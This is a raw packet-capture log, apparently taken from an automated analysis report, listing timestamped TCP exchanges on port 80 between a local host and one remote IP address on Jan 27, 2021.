                                                                            Jan 27, 2021 19:29:37.925550938 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.925574064 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.925611973 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.925635099 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.925647974 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.925683975 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.925698996 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.925723076 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.925760984 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.925767899 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.925807953 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.925848961 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.925853014 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.925884962 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.925921917 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.925929070 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.925960064 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.925997019 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.926013947 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.926038980 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.926075935 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.926086903 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.926122904 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.926163912 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.926167965 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.926201105 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.926238060 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.926244974 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.926275969 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.926311970 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.926320076 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.926348925 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.926386118 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.926392078 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.926433086 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.926474094 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.926480055 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.926510096 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.926558018 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.973736048 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.973805904 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.973834038 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.973864079 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.973901987 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.973938942 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.973975897 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.974013090 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.974065065 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.974107981 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.974118948 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.974144936 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.974148989 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.974154949 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.974184990 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.974221945 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.974258900 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.974268913 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.974297047 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.974320889 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.974330902 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.974379063 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.974409103 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.974420071 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.974457026 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.974494934 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.974498034 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.974534988 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.974558115 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.974570036 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.974606991 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.974642038 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.974642992 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.974689007 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.974708080 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.974730968 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.974766970 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.974800110 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.974803925 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.974841118 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.974867105 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.974870920 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.974905014 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.974941969 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.974950075 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.974987984 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.975016117 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.975030899 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.975066900 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.975102901 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.975105047 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.975142002 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.975167036 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.975177050 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.975214005 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.975250959 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.975254059 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.975296974 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.975316048 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.975338936 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.975374937 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.975411892 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.975411892 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.975447893 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.975471020 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.975482941 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.975521088 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.975558043 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.975564957 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:37.975605011 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:37.975610018 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.023121119 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.023185015 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.023215055 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.023252010 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.023288965 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.023325920 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.023360014 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.023375988 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.023396969 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.023447990 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.023478031 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.023487091 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.023494959 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.023538113 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.023567915 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.023575068 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.023613930 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.023639917 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.023650885 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.023685932 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.023719072 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.023724079 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.023761988 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.023787022 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.023807049 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.023849010 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.023880005 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.023884058 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.023921967 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.023942947 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.023957968 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.023993015 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.024030924 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.024032116 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.024068117 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.024096012 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.024113894 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.024154902 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.024180889 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.024190903 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.024228096 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.024256945 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.024264097 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.024300098 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.024336100 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.024352074 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.024373055 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.024385929 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.024420023 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.024461031 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.024480104 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.024497032 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.024533987 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.024559975 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.024569988 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.024605036 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.024632931 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.024641991 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.024677992 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.024703026 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.024724007 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.024739981 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.024765015 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.024768114 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.024801016 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.024838924 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.024858952 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.024874926 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.024910927 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.024936914 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.024946928 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.025017023 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.072001934 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.072062016 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.072102070 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.072139978 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.072164059 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.072179079 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.072212934 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.072216988 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.072257042 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.072280884 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.072294950 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.072343111 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.072359085 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.072386026 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.072422981 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.072446108 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.072460890 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.072499990 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.072535038 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.072535992 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.072573900 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.072608948 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.072612047 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.072659016 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.072696924 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.072701931 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.072740078 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.072778940 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.072783947 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.072817087 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.072844028 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.072854042 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.072892904 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.072920084 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.072932005 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.072981119 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.072994947 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.073041916 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.073079109 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.073127031 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.073134899 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.073170900 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.073206902 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.073209047 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.073250055 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.073287010 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.073292971 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.073328018 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.073367119 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.073367119 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.073438883 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.073451042 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.073478937 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.073527098 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.073543072 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.073570967 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.073611021 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.073647976 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.073662996 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.073685884 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.073721886 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.073760033 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.073762894 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.073796988 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.073811054 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.073846102 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.073863029 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.073889017 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.073926926 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.073973894 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.073996067 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.074035883 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.074073076 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.074105024 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.074110985 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.074136972 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.074147940 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.074193954 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.074222088 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.074234962 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.074270964 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.074307919 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.074335098 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.074343920 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.074381113 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.074415922 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.074419022 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.074456930 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.074492931 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.074502945 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.074547052 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.074574947 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.074610949 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.074649096 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.074695110 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.074713945 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.074738979 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.074760914 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.074776888 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.074815035 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.074850082 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.074851036 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.074888945 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.074925900 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.074947119 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.074963093 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.074975014 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.075011969 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.075054884 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.075090885 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.075125933 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.075128078 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.075165033 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.075170040 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.075202942 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.075238943 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.075243950 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.075277090 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.075320959 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.075323105 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.075364113 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.075400114 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.075411081 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.075437069 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.075474977 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.075478077 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.075510979 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.075547934 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.075551033 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.075584888 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.075632095 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.075635910 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.075674057 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.075697899 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.075711012 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.075748920 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.075773954 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.075786114 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.075823069 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.075849056 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.075860977 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.075897932 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.075938940 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.075943947 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.076024055 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.124370098 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.124449968 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.124491930 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.124528885 CET8049168193.239.147.103192.168.2.22
                                                                            Jan 27, 2021 19:29:38.124532938 CET4916880192.168.2.22193.239.147.103
                                                                            Jan 27, 2021 19:29:38.124566078 CET8049168193.239.147.103192.168.2.22
